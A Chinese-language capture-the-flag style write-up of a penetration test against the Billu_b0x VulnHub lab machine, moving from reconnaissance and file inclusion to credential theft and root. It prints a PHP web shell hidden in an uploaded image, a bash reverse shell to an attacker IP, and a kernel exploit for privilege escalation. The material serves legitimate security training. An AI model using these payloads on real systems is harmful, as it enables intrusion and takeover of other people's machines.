网络安全从0到0.5之Billu_b0x靶机实战渗透测试

admin 2022年1月28日10:44:17网络安全从0到0.5之Billu_b0x靶机实战渗透测试已关闭评论202 views字数 1708阅读5分41秒阅读模式

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

环境搭建:

渗透机: kali 2021

靶机:Billu_b0x(来源vulhub:https://download.vulnhub.com/billu/Billu_b0x.zip

准备工作

配置好桥接网并查看靶机MAC地址

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

信息收集

渗透怎能少了信息收集呢?信息收集做的好,渗透少不了。
利用arp-scan进行网段扫描,通过MAC地址00:0C:29:A8:A2:36成功搜寻到靶机IP

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

nmap工具进行探测信息:
利用 nmap -n -sS -p- IP 进行半连接扫描
进一步扫描: nmap -A -p- IP 发现只开放了22、80端口

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

dirb目录扫描

开放80端口,尝试利用dirb进行扫描全目录(搜寻敏感信息)

命令:
dirb http://IP/ /usr/share/wordlists/dirb/* (扫描更全)
扫描到一些关键目录,如add、c、test、show、index、phpmy等目录

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

通过80端口进一步利用---利用dirb进行扫描php文件

dirb http://IP/ -X .php

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

访问add目录

尝试第一步:访问 http://172.16.10.100/add,尝试利用
多次尝试无果,猜测可能该页面是纯静态页面,用来迷惑攻击者

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

访问test目录

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

提示:'file' parameter is empty. Please provide file path in 'file' parameter(“文件”参数为空。请在“文件”参数中提供文件路径 )
思路:猜测这里存在文件包含漏洞

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

文件包含利用

思路:访问test目录,尝试file=/etc/passwd 文件包含,发现无效

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

人生得选择那么多,不必撞了南墙还不回头,总有别的选择可以让你选择的~
转变思路:尝试POST请求文件包含,发现成功包含passwd文件

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

意外惊喜,看样子这种方式是成功的,同时发现了一个1000的ID ica,利用同样的方式查看add.php、in.php、c.php、index.php、show.php、panel.php等文件。

包含c.php

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

成功获取到信息 "billu","b0x_billu",但这个不是后台密码(徐晃一枪),进行尝试发现是phpmyadmin后台密码

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

访问phpmyadmin

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

渗透phpmy

思路:利用上面的用户名billu和密码b0x_billu 成功登录phpmyadmin,又找到一个用户密码

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

峰回路转,从网站初始进行渗透,利用用户密码成功登录后台

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

getshell
(思路一)文件包含反弹shell

利用上一步,通过用户密码成功登录后台,发现可以存在文件上传漏洞

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

漏洞利用:生成图片马进行利用,上传一句话GET请求图片木马

普通上传失败,网页显示上传失败。换一种思路,上传一张正常图片并在burp中抓包,在图片末尾加入
<?php system($_GET['cmd']);?>

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

执行语句(cmd.jpg)

成功上传,冲冲冲!上上burp进行改包,利用已上传的GET请求图片木马进行利用,发现可以成功
cat%20/etc/passwd 或 cat /etc/passwd

成功执行:

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

进一步利用:上传反弹shell回弹,需要进行url编码利用

反弹shell:
echo "bash -i >&/dev/tcp/172.16.9.200/3333 0>&1" | bash

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

继续利用burp文件包含,利用木马执行反弹语句,成功getshell

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

提权

思路:提权思路-37292.c
进入靶机后,发现是ubuntu系统是(Ubuntu 12.04.5 LTS)

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

python3 -m http.server 8081
searchsploit -m 37292.c
gcc 37292.c -o 37292
./37292 成功提权

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

(思路二)尝试包含config.inc.php文件

phpmyadmin的默认的配置文件是:config.inc.php,现在我们不知道路径,猜测路径在/var/www/phpmy下

利用curl 文件包含config.inc.php
成功获取到root用户和密码roottoor,可以直接ssh连接

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

一步搞定:利用 ssh root@IP (成功getshell,并且为root权限)

网络安全从0到0.5之Billu_b0x靶机实战渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月28日10:44:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网络安全从0到0.5之Billu_b0x靶机实战渗透测试https://cn-sec.com/archives/757907.html